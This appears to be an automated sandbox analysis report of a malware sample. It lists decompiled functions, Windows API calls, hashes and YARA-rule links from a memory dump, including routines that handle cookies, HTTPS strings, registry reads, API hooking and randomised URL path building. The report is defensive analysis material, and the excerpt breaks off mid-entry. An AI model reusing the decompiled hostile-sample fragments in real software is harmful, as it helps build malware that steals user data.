GetLastError.KERNEL32 ref: 0541D77C

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

GetLastError.KERNEL32 ref: 0541D6F0
WaitForSingleObject.KERNEL32(00000000), ref: 0541D700
GetLastError.KERNEL32 ref: 0541D720

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: fbc9bdc7c3c82d460b98022ec686e28d17caac90b988e2aa6aced4561140061f
Instruction ID: 6b487f9529bd86116b467cb86142fec54e8de2aa0c9afab04b7e23a0878de4f6
Opcode Fuzzy Hash: fbc9bdc7c3c82d460b98022ec686e28d17caac90b988e2aa6aced4561140061f
Instruction Fuzzy Hash: 3C411AB5D00219EFDF24DFA4C9889EEBBB9FB44340B6044AAE811E7250E7309A41DB65

Uniqueness

Uniqueness Score: -1.00%

Function 05408616, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 05420507: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05420539
Part of subcall function 05420507: HeapFree.KERNEL32(00000000,00000000,?,?,0541A793,?,00000022,00000000,?,00000000), ref: 0542055E

HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086D0
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086F0
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,00000001,00000001,?,00000000,00000000,00000000,?), ref: 054086FC

Strings

https://, xrefs: 05408646

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: 5005e5f5fb65a8cddab62579e4628babf0619675543f5dbe1a7deac417ff5bed
Instruction ID: 30465bd32255f4c1c22c11b8f7a6a62f88296d24e44f7258f0af8523208c149c
Opcode Fuzzy Hash: 5005e5f5fb65a8cddab62579e4628babf0619675543f5dbe1a7deac417ff5bed
Instruction Fuzzy Hash: 9C219E31900228BBCF219F51CD88DDF7F66FF01740F21846AF904661A1CB71C991DB98

Uniqueness

Uniqueness Score: -1.00%

Function 05402576, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 054025A5
SetEvent.KERNEL32(?), ref: 054025EF
TlsSetValue.KERNEL32(00000001), ref: 05402629
TlsSetValue.KERNEL32(00000000), ref: 05402645

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: a6bbc33bff819d5c4d255d353615d9d2818f8702c18ac088df730580dccf22aa
Instruction ID: 9df3602a2c1c43f7e9b4eae945abdfbfb2b55f9d76678d810ee78bd40d63fea8
Opcode Fuzzy Hash: a6bbc33bff819d5c4d255d353615d9d2818f8702c18ac088df730580dccf22aa
Instruction Fuzzy Hash: 0B21E135104214AFDB258F16DC899EB7BA6FB81350B64086AF902C72E0DBB0EC61DB14

Uniqueness

Uniqueness Score: -1.00%

Function 05420121, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0542017A
memcpy.NTDLL(00000018,?,?), ref: 054201A3
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0001587C,00000000,000000FF,00000008), ref: 054201E2
HeapFree.KERNEL32(00000000,00000000), ref: 054201F5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: d86ebd0350027c5da4168c36cc7121f7e212108eebf8fc00fad67504b43d60c2
Instruction ID: 02027775109b712d62f49db4248e8e5d8671b2dac1f96debde4c2d1013ae57f5
Opcode Fuzzy Hash: d86ebd0350027c5da4168c36cc7121f7e212108eebf8fc00fad67504b43d60c2
Instruction Fuzzy Hash: DB317F70600725AFDB258F29DC49EEA7FA9FB05360F50451AF916D6290DB70D911CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05421195, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 054211C4
lstrlen.KERNEL32(00000000), ref: 054211D4

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

strcpy.NTDLL ref: 054211EB
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 054211F5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: ce23e9696c9e63650b6d995b949d97e12549ab61e504596ae67b270603bae383
Instruction ID: d1b3db7adc4e72581fb8fd9e78833b376a3d6fa11649f4d2c810b0f3fb71083e
Opcode Fuzzy Hash: ce23e9696c9e63650b6d995b949d97e12549ab61e504596ae67b270603bae383
Instruction Fuzzy Hash: 5221CF72614721AFD728AF65D889BAB7BE8FF84311F50941AF95BD6280EF74C401CA21

Uniqueness

Uniqueness Score: -1.00%

Function 05426376, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05958D20), ref: 0542638C
RtlLeaveCriticalSection.NTDLL(05958D20), ref: 054263A7
GetLastError.KERNEL32 ref: 05426415
GetLastError.KERNEL32 ref: 05426424

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: a75372785386a5ddca88f6ec9021af505558caab89ac89a57672bdd09cf29794
Instruction ID: 84743046d1d2df982a58ddf1fa34cbc14f7131046032b0673e1d311873c27755
Opcode Fuzzy Hash: a75372785386a5ddca88f6ec9021af505558caab89ac89a57672bdd09cf29794
Instruction Fuzzy Hash: 62215C35900239EFCB25CF94D805AEE7BB9FF48714B5281A6F94293210CB30DA21EF95

Uniqueness

Uniqueness Score: -1.00%

Function 05404BB6, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 05404BD8
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 05404C1C
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 05404C62
CloseHandle.KERNEL32(?,?,?,?,?), ref: 05404C85

Part of subcall function 0540B30C: GetTickCount.KERNEL32 ref: 0540B31C
Part of subcall function 0540B30C: CreateFileW.KERNEL32(054177B2,80000000,00000003,0542E0E4,00000003,00000000,00000000,?,054177B2,?,00000000,?,00000000), ref: 0540B339
Part of subcall function 0540B30C: GetFileSize.KERNEL32(054177B2,00000000,Local\,00000001,?,054177B2,?,00000000,?,00000000), ref: 0540B365
Part of subcall function 0540B30C: CreateFileMappingA.KERNEL32(054177B2,0542E0E4,00000002,00000000,00000000,054177B2), ref: 0540B379
Part of subcall function 0540B30C: lstrlen.KERNEL32(054177B2,?,054177B2,?,00000000,?,00000000), ref: 0540B395
Part of subcall function 0540B30C: lstrcpy.KERNEL32(?,054177B2), ref: 0540B3A5
Part of subcall function 0540B30C: HeapFree.KERNEL32(00000000,054177B2,?,054177B2,?,00000000,?,00000000), ref: 0540B3C0
Part of subcall function 0540B30C: CloseHandle.KERNEL32(054177B2,Local\,00000001,?,054177B2), ref: 0540B3D2

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 8ec06042b2ab2e27974e0a26e4e5ac436f68e3c08b94ded9acac24bb0f3eb672
Instruction ID: 58dd56a1b4aced9b871c2c7c1ed566c4036af3f549bbce16debe781643c73ee8
Opcode Fuzzy Hash: 8ec06042b2ab2e27974e0a26e4e5ac436f68e3c08b94ded9acac24bb0f3eb672
Instruction Fuzzy Hash: F4213D71504309DBDF21DFA6DD48EEE7BB9FF49364F21112AFA15922A0E7309445CB90

Uniqueness

Uniqueness Score: -1.00%

Function 054022B8, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0542009C: GetTickCount.KERNEL32 ref: 054200B2
Part of subcall function 0542009C: wsprintfA.USER32 ref: 054200F3
Part of subcall function 0542009C: GetModuleHandleA.KERNEL32(00000000), ref: 05420105

GetModuleHandleA.KERNEL32(00000000,?), ref: 054022DF
GetLastError.KERNEL32 ref: 054022F9
RtlExitUserThread.NTDLL(?), ref: 05402313
GetLastError.KERNEL32 ref: 05402353

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
String ID:
API String ID: 1798890819-0
Opcode ID: 8e46567cdff622d2bae324a22a25ede26e628886827529eb1c03c8e9f8f9dce0
Instruction ID: 9807d68415abceddf2b7cc46febd00218d2b0721767c7dca6c8cbf2f51f67ad3
Opcode Fuzzy Hash: 8e46567cdff622d2bae324a22a25ede26e628886827529eb1c03c8e9f8f9dce0
Instruction Fuzzy Hash: B711AC71418224EF9324AB76EC8DCBB7FBCFAC6610754092AF956C2180CB7098028B32

Uniqueness

Uniqueness Score: -1.00%

Function 0541764A, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0541E943: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05417661), ref: 0541E969

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0541769C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,05417E65,4C72644C), ref: 054176AE
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,05417E65,4C72644C), ref: 054176C6
CloseHandle.KERNEL32(?,?,?,?,?,?,05417E65,4C72644C), ref: 054176E1

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 03d05ad20b45e3db2bb6cc30093399512668dc778cfc2061591dbec6a4ac257e
Instruction ID: d8efa9b002aa51e992ea1a5aecdab8234c37389dc8f8ce73f791e5b55e16eb2d
Opcode Fuzzy Hash: 03d05ad20b45e3db2bb6cc30093399512668dc778cfc2061591dbec6a4ac257e
Instruction Fuzzy Hash: E7116071610228BBDF21AF6ACC89EFF7E7DEF01660F144056F905E6190DB708A40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0540161E, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 05401656

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

lstrcpy.KERNEL32(00000000,?), ref: 0540166D
StrChrA.SHLWAPI(00000000,0000002E), ref: 05401676
GetModuleHandleA.KERNEL32(00000000), ref: 05401694

Part of subcall function 0540600F: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,?,?,00000000,00000001,00000000,00000000,0542A578,0000001C), ref: 054060E6
Part of subcall function 0540600F: VirtualProtect.KERNELBASE(00000000,00000004,?,?,?,00000000,00000001,00000000,00000000,0542A578,0000001C,054016AB,?,00000000,00000000), ref: 05406101
Part of subcall function 0540600F: RtlEnterCriticalSection.NTDLL(0542E260), ref: 05406125

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: f1a57386374855c44d3b2a85a3130c6f6a42440cf0beb3533290974520b136db
Instruction ID: 3b82908e9d14d6dd278a018901b4675d9cd4681aeab5e2ca5aca080fd70c71cb
Opcode Fuzzy Hash: f1a57386374855c44d3b2a85a3130c6f6a42440cf0beb3533290974520b136db
Instruction Fuzzy Hash: 01213C34A00209EFDB14DF66CC48AEEBBF9BF45304F2894AAA4069B291DB70D941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 05401B5D, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05401B78
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 05401B9C
RegCloseKey.ADVAPI32(?), ref: 05401BF4

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 05401BC5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 39f30e32fdd1727100aebca15daa5ccf770eb6f802c8d3a667248d7860113b52
Instruction ID: 06ee7ecfbe8c5dd494fc16d726849d9397902abca563608abf75f382930343ca
Opcode Fuzzy Hash: 39f30e32fdd1727100aebca15daa5ccf770eb6f802c8d3a667248d7860113b52
Instruction Fuzzy Hash: 4521C97590011CFFCB11AF99CC88CEEBFBAEB84340B2090A6F801E6250E7719A51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 054031B8, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0540672C,7748D3B0,05958D54,00000000,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 054031DE
StrTrimA.SHLWAPI(00000000,0542A4A4,00000000,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 054031FD
StrChrA.SHLWAPI(00000000,0540672C,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 0540320E
StrTrimA.SHLWAPI(00000001,0542A4A4,?,?,05409160,0540672C,00000020,05958D54,?,?,0540672C), ref: 05403220

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: a38bd0bbc402808f3bf0073511f6f00db7611977644186cc8f2b6ff6bd3b2e63
Instruction ID: fa5629712f00af30b8dcf231778b51ea497698962384016fa5045b1f51951b95
Opcode Fuzzy Hash: a38bd0bbc402808f3bf0073511f6f00db7611977644186cc8f2b6ff6bd3b2e63
Instruction Fuzzy Hash: 8911BF75204218BFCB04CF59C884EEE7FB8EF49651F60841AFC099B241CAB0D901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 05422A14, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0541F24D,00000000,?,?,0541331C,00000000,05958D60), ref: 05422A1F
RtlAllocateHeap.NTDLL(00000000,?), ref: 05422A37
memcpy.NTDLL(00000000,?,-00000008,?,?,?,0541F24D,00000000,?,?,0541331C,00000000,05958D60), ref: 05422A7B
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 05422A9C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 3f99821d976a8804b667a2a2cc6d5f03470c85b8456ab663bd112ec94b266089
Instruction ID: 2c3b65983919f9b030857e93aaab464a53db4f3e2126dd4dd6ac85f73136ee19
Opcode Fuzzy Hash: 3f99821d976a8804b667a2a2cc6d5f03470c85b8456ab663bd112ec94b266089
Instruction Fuzzy Hash: D8112972A00234AFD7248F69DC89DDEBFADEBC0290B450176F904D7240EA709A05C765

Uniqueness

Uniqueness Score: -1.00%

Function 027771BA, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E027771BA(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x277d1f0, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x277d208; // 0x1a0b3e7f
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x277d208 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x027771c2
0x027771c5
0x027771cb
0x027771e3
0x027771e7
0x027771ea
0x027771ec
0x027771ef
0x027771f1
0x027771f4
0x027771f6
0x027771f6
0x027771f8
0x02777203
0x02777208
0x02777219
0x02777221
0x02777226
0x02777229
0x0277722c
0x0277722e
0x02777234
0x02777237
0x02777237
0x02777237
0x02777242
0x02777247
0x02777251

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,027714A0,00000000,?,00000000,02776C79,00000000,04F39630), ref: 027771C5
RtlAllocateHeap.NTDLL(00000000,?), ref: 027771DD
memcpy.NTDLL(00000000,04F39630,-00000008,?,?,?,027714A0,00000000,?,00000000,02776C79,00000000,04F39630), ref: 02777221
memcpy.NTDLL(00000001,04F39630,00000001,02776C79,00000000,04F39630), ref: 02777242

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: c9ed532999f899540d824880851a28d3fb22968a3100440b64dc32b70f051cf4
Instruction ID: 201c15d72c7b18dedce7814de74faee22082aba8a743e0c32b5993af348de983
Opcode Fuzzy Hash: c9ed532999f899540d824880851a28d3fb22968a3100440b64dc32b70f051cf4
Instruction Fuzzy Hash: 16112972E00114AFC7158B69DC88D9FBBBEEF95350B05827AF905D7140EB709E14C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0277752B, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0277752B(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E027775C4(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x277c2bc);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x277c2bc);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x02777536
0x0277753a
0x0277753c
0x0277753d
0x02777545
0x02777545
0x02777549
0x00000000
0x00000000
0x02777540
0x02777541
0x02777544
0x02777544
0x02777551
0x02777558
0x0277755c
0x02777564
0x0277756a
0x0277756c
0x02777571
0x02777575
0x02777577
0x0277757a
0x02777581
0x02777581
0x0277758b
0x0277758e
0x02777591
0x02777591
0x0277759d
0x0277759d
0x027775aa

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04F3962C,?,?,?,02775B5B,04F3962C,?,?,027779CC), ref: 02777545
StrTrimA.SHLWAPI(?,0277C2BC,00000002,?,?,?,02775B5B,04F3962C,?,?,027779CC), ref: 02777564
StrChrA.SHLWAPI(?,00000020,?,?,?,02775B5B,04F3962C,?,?,027779CC,?,?,?,?,?,027787DD), ref: 0277756F
StrTrimA.SHLWAPI(00000001,0277C2BC,?,?,?,02775B5B,04F3962C,?,?,027779CC,?,?,?,?,?,027787DD), ref: 02777581

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 3ac0f750b814c1dffd7d917cb5a00e6ed882a0cf85db203821e9cfa4a41947c2
Instruction ID: a3c6ef7f8e5d13ee6e03cbe6f8fb9ee7c28e4a9208a6057968e847e2f5de583e
Opcode Fuzzy Hash: 3ac0f750b814c1dffd7d917cb5a00e6ed882a0cf85db203821e9cfa4a41947c2
Instruction Fuzzy Hash: F10175716453215FD6359F658C49F2BBF98FF8AAA4F12195DF841D7241EB60C801C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0540B9F0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0541C8A5: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0541C8D4
Part of subcall function 0541C8A5: HeapFree.KERNEL32(00000000,00000000,?,?,0540BA00,?,00000000,?,00000000,?,0541A7B4,?,?,?,?,?), ref: 0541C8F7

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,0541A7B4,?,?,?,?,?,00000022,00000000), ref: 0540BA2A

Part of subcall function 05411C7A: lstrlen.KERNEL32(00000000,00000000,00000000,75145520,?,?,00000022,00000000,?,00000000), ref: 05411C91
Part of subcall function 05411C7A: lstrlen.KERNEL32(?,?,00000000), ref: 05411C99
Part of subcall function 05411C7A: lstrlen.KERNEL32(?), ref: 05411D04
Part of subcall function 05411C7A: RtlAllocateHeap.NTDLL(00000000,?), ref: 05411D2F
Part of subcall function 05411C7A: memcpy.NTDLL(00000000,00000002,?), ref: 05411D40
Part of subcall function 05411C7A: memcpy.NTDLL(00000000,?,?), ref: 05411D56
Part of subcall function 05411C7A: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 05411D68
Part of subcall function 05411C7A: memcpy.NTDLL(00000000,054283F4,00000002,00000000,?,?,00000000,?,?), ref: 05411D7B
Part of subcall function 05411C7A: memcpy.NTDLL(00000000,00000000,00000002), ref: 05411D90

HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0541A7B4,?,?,?,?,?,00000022,00000000,?,00000000), ref: 0540BA76

Strings

https://, xrefs: 0540BA39
Cookie: , xrefs: 0540BA12

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$Freelstrlen$Allocate
String ID: Cookie: $https://
API String ID: 2465664858-1563071917
Opcode ID: 7a6dadbca2e61133b049e6be5503a2d121ca3edfa49b67c6835ec9579a15b27b
Instruction ID: ae52eb27c4e75dc78124e62d4528dc54ab3a9842f1144327273785defce2334b
Opcode Fuzzy Hash: 7a6dadbca2e61133b049e6be5503a2d121ca3edfa49b67c6835ec9579a15b27b
Instruction Fuzzy Hash: B401A532654234BBCB215F29DC45FFF3F68EB45661F558126FC0897250CB30D901DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0540E90F, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,05420813,00000000,00000000), ref: 0540E92D
GetLastError.KERNEL32(?,00000000,?,05420813,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,05412639,?,0000001E), ref: 0540E935

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 0fd9bde30e56990ff2ff11671a59cfe5a0142183e88c368e52fbbb8b5b5f03ef
Instruction ID: 7c861b9a1ff5e51ea684f4351236958eef87d053d1771d5f96b27e9646f8301c
Opcode Fuzzy Hash: 0fd9bde30e56990ff2ff11671a59cfe5a0142183e88c368e52fbbb8b5b5f03ef
Instruction Fuzzy Hash: 26018D321082617F9E74DA269C48DAFBE6DE7C5760B100E2EF865922D0DA305411C671

Uniqueness

Uniqueness Score: -1.00%

Function 0542031A, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0542032D
lstrlen.KERNEL32(05958BC0), ref: 0542034E
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 05420366
lstrcpy.KERNEL32(00000000,05958BC0), ref: 05420378

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 4bd4d9be88d5843921c3e1c17514ff825565281e66b4abb23d35cc0546d03747
Instruction ID: f80ca42d55694e04c1f67472777cad3f2ef5344145df3ea0ecde7bf02320d959
Opcode Fuzzy Hash: 4bd4d9be88d5843921c3e1c17514ff825565281e66b4abb23d35cc0546d03747
Instruction Fuzzy Hash: 2E010872A04328EFC321DBA99848BDFBFFCAB48301F450169F90AE3201CA30D504C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 05406F35, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 05406F42
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 05406F68
lstrcpy.KERNEL32(00000014,?), ref: 05406F8D
memcpy.NTDLL(?,?,?), ref: 05406F9A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: a58d7d8c2ee4dd8cd407cd95c72dc37a086c10d05657973f76b00f2b006bf567
Instruction ID: 0ffaea3e8580c7ec4f58964cff72e746a8f2e73d40d95c48f999d899c0539eab
Opcode Fuzzy Hash: a58d7d8c2ee4dd8cd407cd95c72dc37a086c10d05657973f76b00f2b006bf567
Instruction Fuzzy Hash: E811347190461AEFC721CF58D884A9ABBF8FB48704F11856EF85A97350CB71E915CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05402755, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,Blocked), ref: 05402771
lstrcmpi.KERNEL32(?,Main), ref: 054027A6

Strings

Blocked, xrefs: 0540276B
Main, xrefs: 054027A0

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrcmpi
String ID: Blocked$Main
API String ID: 1586166983-1966386946
Opcode ID: 6d71d474829d981f088a9cc53822a8b3cbb33961bd3b2a7987efeec9282cb5a2
Instruction ID: 854ea71e0f53c9c4303dc76caad5a4c43bcdba5cb33dbe4469d9635745123fe0
Opcode Fuzzy Hash: 6d71d474829d981f088a9cc53822a8b3cbb33961bd3b2a7987efeec9282cb5a2
